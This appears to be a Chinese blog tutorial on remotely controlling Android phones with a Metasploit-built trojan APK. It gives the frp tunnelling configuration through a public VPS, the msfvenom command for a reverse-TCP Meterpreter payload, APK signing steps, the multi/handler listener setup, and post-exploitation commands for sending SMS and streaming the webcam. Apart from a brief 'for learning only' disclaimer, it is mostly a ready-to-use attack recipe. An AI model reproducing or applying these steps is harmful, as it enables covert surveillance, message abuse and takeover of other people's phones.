Metasploit生成Android木马远控自己的安卓设备

这篇具有很好参考价值的文章主要介绍了Metasploit生成Android木马远控自己的安卓设备。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

声明,本文实验仅用作学习和测试实验请勿用作他途
我们先用frp工具来实现端口映射,利用处在内网的攻击机kali实现对处在外网的Android机器的入侵。

1、内网穿透

实验环境:

  • 目标Android设备
  • 公网vps(centos)
  • 内网攻击机kali

思路:

  • 公网vps运行frp server
  • 本地kali运行frp client
  • 将kali本地端口映射到公网vps

VPS 服务端:

将vps作为frp服务端,执行 ./frps -c ./frps.ini ,服务端的配置 frps.ini 如下:
metasploit对安卓系统渗透,网络安全之Metasploit(MSF),android,安全,网络安全,安全架构

客户端:

将内网攻击机kali作为frp客户端,客户端的配置 frps.ini 如下:

[common]
server_addr = 118.24.74.203 # 这里是公网vps的ip
server_port = 7000 # 这里的端口要跟服务端的一样
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444 # 将到达frp服务器的数据转发给本地的4444端口
remote_port = 11111 # 服务端的11111端口转发给本地

客户端通过vps的IP和7000监听端口建立连接,把公网的11111端口数据传递给本地的4444端口。配置完,执行 ./frpc -c ./frpc.ini 启动客户端:
metasploit对安卓系统渗透,网络安全之Metasploit(MSF),android,安全,网络安全,安全架构

2、Metasploit生成木马

用Metasploit生成载有Payload的Android的apk。在Kali Linux里面打开一个新的窗口输入:

msfvenom -p android/meterpreter/reverse_tcp LHOST=39.xxx.xxx.210(vps公网ip)
LPORT=2333(公网) R > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=118.24.74.203 LPORT=11111 R >
/home/kali/shell.apk

metasploit对安卓系统渗透,网络安全之Metasploit(MSF),android,安全,网络安全,安全架构

3、为apk应用签名(非必须)

我们已经成功创建了Android格式(APK)文件的有效载荷。但是,现在一般Android的移动设备不允许
安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。我们可以使用如下工具
进行手动签名:

Keytool
JARsigner
zipalign

这3个软件,Kali中内置了前2个,第3个需要安装(在新版kali中,JARsigner也需要自己安装apt install
openjdk-11-jdk-headless)

  1. 使用keytool生成一个key文件。
    会让你输入该key的名称、单位、地址等等信息,最终生成一个key文件
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg
RSA -keysize 2048 -validity 10000

metasploit对安卓系统渗透,网络安全之Metasploit(MSF),android,安全,网络安全,安全架构
上面问你的东西随便填就行,但是要注意,最后不要输入yes要输y,不然会一直询问。
如下图,生成一个key文件:

metasploit对安卓系统渗透,网络安全之Metasploit(MSF),android,安全,网络安全,安全架构
2. 使用该key文件配合JARsigner为APK签名

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-releasekey.Keystore shell.apk alias_name

metasploit对安卓系统渗透,网络安全之Metasploit(MSF),android,安全,网络安全,安全架构
3. 然后使用JARsigner验证签名

jarsigner -verify -verbose -certs shell.apk

metasploit对安卓系统渗透,网络安全之Metasploit(MSF),android,安全,网络安全,安全架构
metasploit对安卓系统渗透,网络安全之Metasploit(MSF),android,安全,网络安全,安全架构
到此为止,就完成了签名过程,此shell.apk就可以在Android中使用了。

4、开启Metasploit进行监听

使用metasploit监听本地接受数据的端口

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit

然后将载有payload的APK发送到手机上安装并启动,此时,msf上面就可以得到手机的一个session
了:

metasploit对安卓系统渗透,网络安全之Metasploit(MSF),android,安全,网络安全,安全架构
这里,有的手机得到的session一会儿自动断开,不知道为什么,我自己想了个解决办法是:刚一获得
session就马上执行 webcam_stream 开启远程视频,之后断开视频就可以了,session就稳定了,不会
再断开了,不知道为什么!
在我们获取了目标Android手机的Meterpreter权限之后,我们可以执行如下命令进行后渗透攻击

5、后渗透攻击

查看手机是否root过

check_root

metasploit对安卓系统渗透,网络安全之Metasploit(MSF),android,安全,网络安全,安全架构
控制目标手机发送短信

send_sms -d 某个手机号码 -t "hello"

在我们获取了目标Android手机的Meterpreter权限之后就可以通过各种命令对被控手机进行各种操作,比如开启摄像头、定位、拍照片啦什么的。命令什么都可以搜到在这里我就不过多展示了感兴趣的自己去了解吧,再说一遍本文实验仅仅用于学习!。文章来源地址https://www.toymoban.com/news/detail-785652.html

到了这里,关于Metasploit生成Android木马远控自己的安卓设备的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 使用ADB命令查询Android设备的安卓版本信息

    确保你已经安装了ADB并将其添加到系统的路径中。 连接你的Android设备到计算机,并确保启用了开发者选项和USB调试模式。你可以在设备的设置中找到这些选项。 打开终端(命令提示符或终端窗口)。 运行以下ADB命令来获取Android设备的安卓版本信息: 如果你希望获得更详细

    2024年02月08日
    浏览(43)
  • Kali Linux使用MSF木马入侵安卓手机

    声明: 本文章仅做娱乐和学习,切勿非法使用!! 本人技术一般,水平有限,如有不对请多多指正。 Kali Linux 安卓手机一部(安卓11) 要想玩的好,总不能本地玩自己吧,也得和周边朋友开个玩笑吧,所以就得做内网穿透了,免费内网穿透可以看这位大佬的 CSDN博主「Lisa

    2024年01月24日
    浏览(41)
  • 安卓APP证书Android签名证书.keystore文件制作生成

    将app发布到应用宝时,而上传安装包时提示如下图时, 但您或您的团队从未上传该应用,您可以通过认领功能认领应用。认领成功后该应用会自动转入您的账户下,同时保留应用全部数据,您可以在应用管理中进行管理。 1.点击认领应用 ,确认需认领应用的包名是否是你的

    2024年02月02日
    浏览(49)
  • MSF生成木马及木马的简单使用

    本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。 由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM 环境配置说明 在kali虚拟机中使用 msfvenom 命令,查看kali中是否安装msfvenom模块

    2023年04月09日
    浏览(56)
  • Yolov5+win10+pytorch+android studio实现安卓实时物体检测实战(coco128/coco/自己的训练集)

    在这里感谢各个大佬的参考文献及资料。在我学习深度学习的过程中,我参考了如下网站: Win10+PyTorch+YOLOv5 目标检测模型的训练与识别 | | 洛城风起 YOLOv5 COCO数据集 训练 | 【YOLOv5 训练】_墨理学AI的博客-CSDN博客_yolov5训练coco数据集 系统环境:win10 cuda 版本:11.3 Cuda环境配置 在

    2023年04月11日
    浏览(42)
  • 1.3 Metasploit 生成SSL加密载荷

    在本节中,我们将介绍如何通过使用 Metasploit 生成加密载荷,以隐藏网络特征。前一章节我们已经通过 Metasploit 生成了一段明文的ShellCode,但明文的网络传输存在安全隐患,因此本节将介绍如何通过生成SSL证书来加密ShellCode,使得网络特征得到隐藏,从而提高后门的生存能力

    2024年02月11日
    浏览(29)
  • Android Studio项目打包生成可安装在自己手机上的App安装包文件

    点击上方 “ 码农的后花园 ”, 选择 “ 星标 ”  公众号 精选文章,第一时间送达 Android 打包 其实我们现在Android手机上所有的应用都是.apk文件,只不过分为系统自带和第三方,一个.apk文件本质其实就对应于你手机上的一个应用App程序,比如支付宝,淘宝。 .apk文件就是一个

    2024年02月05日
    浏览(97)
  • MSF生成后门木马

    前言 为了方便平时使用,记录一下操作命令 注意: lhost 为本地地址, rhost 为目标地址 1、👋Windows 生成连接木马 将木马放到目标服务器运行 使用模块连接我们的木马 2、👋Linux 使用 msfvenom 模块生成连接木马 x64生成64位的🐎 x86生成32位的🐎 elf 为可执行的二进制文件 若传

    2024年02月06日
    浏览(39)
  • Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用

    博主根据日后学习会不断更新文章,后续用到新的功能会不定时更新。 以下内容只供学习使用,请勿违法使用! 目录 一、常用指令 二、监听模块 2.1 防止假session 2.2 实现后台持续监听 三、msfvenom(payload生成模块) 3.1 参数介绍 3.2 常用指令 3.3 payload 生成 3.3.1 Linux 3.3.2 Windows

    2024年02月07日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包